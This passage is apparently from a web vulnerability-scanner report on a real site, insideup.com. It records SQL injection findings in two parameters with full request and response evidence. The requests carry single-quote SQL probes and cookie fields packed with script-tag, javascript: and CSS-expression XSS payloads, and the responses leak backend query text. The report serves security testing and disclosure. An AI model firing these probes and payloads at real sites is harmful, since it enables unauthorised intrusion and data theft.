User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sog4frkf2okc3avt0tg9j4o6u6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.227. http://www.insideup.com/ppc/leadflow/deco00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ji3d5e3882mj79e54bldivter1; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aigu1fsjv0mpbqj8v0cm0sj8d2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.228. http://www.insideup.com/ppc/leadflow/deco00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fi5kna2v2iv2v7gfaosg57fhp1; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5

Request 2

